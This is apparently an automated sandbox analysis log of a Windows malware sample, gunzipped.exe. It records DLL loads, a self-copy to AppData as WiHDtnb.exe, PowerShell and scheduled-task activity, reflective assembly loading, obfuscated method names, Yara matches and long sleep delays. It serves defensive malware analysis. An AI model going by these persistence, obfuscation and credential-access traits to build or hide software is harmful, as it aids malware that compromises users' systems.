Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, MDPgEsKDpcwVQ43E7V.cs	.Net Code: jZ3j8udRga System.Reflection.Assembly.Load(byte[])
Source: 0.2.gunzipped.exe.5110000.5.raw.unpack, LoginForm.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, LoginForm.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 9.2.WiHDtnb.exe.2c6d1d4.0.raw.unpack, LoginForm.cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: Yara match	File source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gunzipped.exe PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WiHDtnb.exe PID: 3220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WiHDtnb.exe PID: 6148, type: MEMORYSTR

Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_058512C8 push esp; ret	9_2_058512C9
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_0585C23C pushad ; ret	9_2_0585C23F
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_06322247 push es; ret	9_2_06322260
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 12_2_00402AC0 push eax; ret	12_2_00402AD4
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 12_2_00402AC0 push eax; ret	12_2_00402AFC

Source: gunzipped.exe	Static PE information: section name: .text entropy: 7.886814119771072
Source: WiHDtnb.exe.0.dr	Static PE information: section name: .text entropy: 7.886814119771072

Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, Jn2EnVIQDOPAQsH9rP.cs	High entropy of concatenated method names: 'Dispose', 'fl32WdCKVL', 'i0JJsvsUZN', 'CZu44rplHX', 'JLW2wUQ7jT', 'pxt2zDcXXg', 'ProcessDialogKey', 'SflJYYTyES', 'WioJ2N1RU7', 'XFTJJbDhmT'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, rBPbMmzMtjydMGnjn4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qLoqbrrr0f', 'RqnqXKiAYi', 'NlJqdQyjd4', 'klDqTqPE38', 'A5Vqvxg4wn', 'bRYqq4SJCJ', 'uBDqkFM5Co'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, YXLBSmHeAMwuvB1LF5.cs	High entropy of concatenated method names: 'zWnGoi1ScL', 'PRQG06SnTo', 'b1lG5uvZmS', 'DlEGa8lCST', 'RdnGP8GmDj', 'Q8J5pukTl5', 'PQi5NyWus0', 'P9f5yxLZt7', 'wjZ5fFg8Xq', 'Kuh5WGvsjP'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, h17c3NXtdNiUK364F8.cs	High entropy of concatenated method names: 'Qjb0ZlJLYr', 'Tho0Bs5vhM', 'sgg03S1ddt', 'Gfx0VrebwU', 'ouN0prX4ZE', 'qWB0NaXcsa', 'AaS0yRKXWt', 'nJs0fv38XX', 'xZP0WsJmAb', 'jSP0wKdbSE'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, vdXHWAhggmuwWk28UG.cs	High entropy of concatenated method names: 'n7VaQ7jJFD', 'lRUamUKjGD', 'NE4a8xbneo', 'tfraELnnTY', 'Rw6axfFQX7', 'fHLaKOdLdQ', 'Sc4acDtbpx', 'AqNalbxp6K', 'cXxa9dpOZP', 'XNRaCVpscU'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, CQlcd80GsnC8o2YDwN.cs	High entropy of concatenated method names: 'l7XvMBvgWa', 'ab7v0TxHPs', 'OO3vUkXy7c', 'c58v5r0JUq', 'T54vG0f89s', 'LG9va6xh0Y', 'aFavPA5wBR', 'bkrvS1YguX', 'wgFvhiI0pK', 'gblvA6CHa0'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, I5OmECnjy883pdUQsx.cs	High entropy of concatenated method names: 'efeUEG7RaE', 'VqTUKYCl9F', 'D4HUlJlUkR', 'xStU9n51bn', 'K8aUXL3x6p', 'BkcUdOSGjR', 'XF9UTtWGDl', 'LjkUvyDQpS', 'XtyUqYpxvU', 'D4yUkENaUd'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, oZqwNLW6n8ZvFWkqcr.cs	High entropy of concatenated method names: 'va38vywhi', 'IlyE0SsL1', 'TjlKrcnqj', 'VBvcjROEQ', 'cHl94WOcv', 'g7aCMVe7t', 'kdrOhajPO2heXmj8Y5', 'FHGppeguJiAF9Lp3Za', 'D7H7LTb1sFY1J4jOse', 'bCpvNAJXx'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, IqUFlYUT5mgAcFF8QH.cs	High entropy of concatenated method names: 'qTMXHFxni6', 'VPeX19PQDM', 'ybFXZncnkG', 'qQBXBEA42i', 'NbxXsoIAox', 'HGqXOiA9xl', 'dHKXLfc0gV', 'mWWXD7egBP', 'qiHXihsEFQ', 'wduXuWEuVg'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, XhfMnd878lAOdC1G2f.cs	High entropy of concatenated method names: 'xCoblSyDyr', 'EVGb9in1HV', 'sldbIvgse7', 'yXabs86xDg', 'aiQbLnZhZU', 'I4qbDpd1mB', 'wZ3buR6y3x', 'EV0b6F0W6X', 'LB1bHPQCIH', 'Kq8brwSHOe'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, IQxL105Tu2BGiAI5Mx.cs	High entropy of concatenated method names: 'Cl1vIN4EMT', 'YCUvsSOymS', 'qoLvOfiJAb', 'JZcvL6nxvm', 'uCUvZIBphK', 'enDvDQFiTh', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, q03tcrBrNaye7G2suDI.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'z1NkZasdmL', 'hKxkBnbC8X', 'WSpk3hqIb9', 'w5vkVX3Zyw', 'B81kpdwusW', 'XknkN8NOSj', 'bepkyCEjiD'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, LQIEEZqSBkUyfaw4Mb.cs	High entropy of concatenated method names: 'V2t2a9KA8h', 'dU62PYiCSe', 'EwX2hvl4UX', 'vHF2AVgEZt', 'arR2XBM0QJ', 'UiU2d7VAdE', 'ftxDWv0GvAtG2aTrPk', 'nxf5JiMJB4glmFsPQB', 'dtT22ttp8r', 'xvb2gSn6Z1'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, mIR5saYmuhXPx2Zl9f.cs	High entropy of concatenated method names: 'aEQTfarKes', 'GRwTwFuHuX', 'GHwvY94jxS', 'kqKv21Wamn', 'HgwTr9pp2P', 'JT6T1EVRsb', 'TZZT7CjLUl', 'd6PTZruoy8', 'LHgTBBA5JA', 'SrRT3BInVB'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, x7K8maR0qhDw2haw0u.cs	High entropy of concatenated method names: 'gTO5xAatZU', 'u405cqHQdt', 'eaUUOZD5XN', 'fVmULnA7gO', 'VJGUDVSOsO', 'cGgUiD2Lah', 'p1sUuaHLBX', 'jHRU6ghouj', 'wRvUR38ENN', 'wSkUHtCbl7'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, FtjtbYBFqN1dUmF0V1a.cs	High entropy of concatenated method names: 'N6oqQ3oC2t', 'IAuqmaMbSb', 'Gtlq8tWifO', 'aHhqE1a8C7', 'O1fqxPBcsQ', 'H7VqKZnYxM', 'yrnqcPsNZi', 'TKYqlv0EuZ', 'mbSq93mHCq', 'BMSqCIh3NY'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, AtgduKZWyWTv7OA0rF.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'B1aJWJgnRJ', 'hCiJwQ6t0h', 'tkUJzZKUjX', 'qOMgYd2SVG', 'r90g2qdaR2', 'HA1gJUHBJC', 'gJRggOWIu9', 'mJqSjZplnIy8ANkuNWS'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, Vh06207SCl76GKsVrU.cs	High entropy of concatenated method names: 'b0kq2qaVdp', 'ynqqgRWFCW', 'g69qjTln9g', 'kMnqMqgWt4', 'Mo6q0V8TmJ', 'UoPq5M0gFu', 'OKHqG9AU11', 'gonvyBg0cu', 'JwdvfEh4su', 'WnIvWoFg3d'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, MDPgEsKDpcwVQ43E7V.cs	High entropy of concatenated method names: 'RyxgoKu4hA', 'J6PgMFrKhD', 'W5xg0YFccC', 'b8XgUGf7EE', 'EH6g5PQcEY', 'gRegGLCeXy', 'skFgaBIDvO', 'E1ygPLCLDj', 'UZsgSk6coO', 'tyUghZ3UlC'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, JR1vqud7YpclTLHFs7.cs	High entropy of concatenated method names: 'ToString', 'K1Ldr8JheI', 'NlJdslW34E', 'lBddOe4olE', 'fBPdLaWdcb', 'isFdDpqPjA', 'wI5difqVNb', 'vQbdul9Kfu', 'q9Id6bCKKH', 'gCedRAmhBy'
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, lSgBETOKP5wE1xrnvT.cs	High entropy of concatenated method names: 'zQpaMA6sLw', 'Ka4aU2psGW', 'cBOaGokXuY', 'NOTGw9kNIY', 'MvPGzWAHm2', 'KZ9aYk0biN', 'wd8a23YbD9', 'YBgaJrcatf', 'DQCagXVQQV', 'UYVajyyyp9'

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe	Memory allocated: 24B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Memory allocated: 2570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Memory allocated: 4570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Memory allocated: 5E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Memory allocated: 6E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Memory allocated: 6FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Memory allocated: 7FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Memory allocated: 1310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Memory allocated: 2C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Memory allocated: 4C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Memory allocated: 6470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Memory allocated: 60F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Memory allocated: 7470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Memory allocated: 8470000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7160			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2568			Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe TID: 6504	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2800	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe TID: 2696	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe TID: 2696	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe TID: 4320	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\gunzipped.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

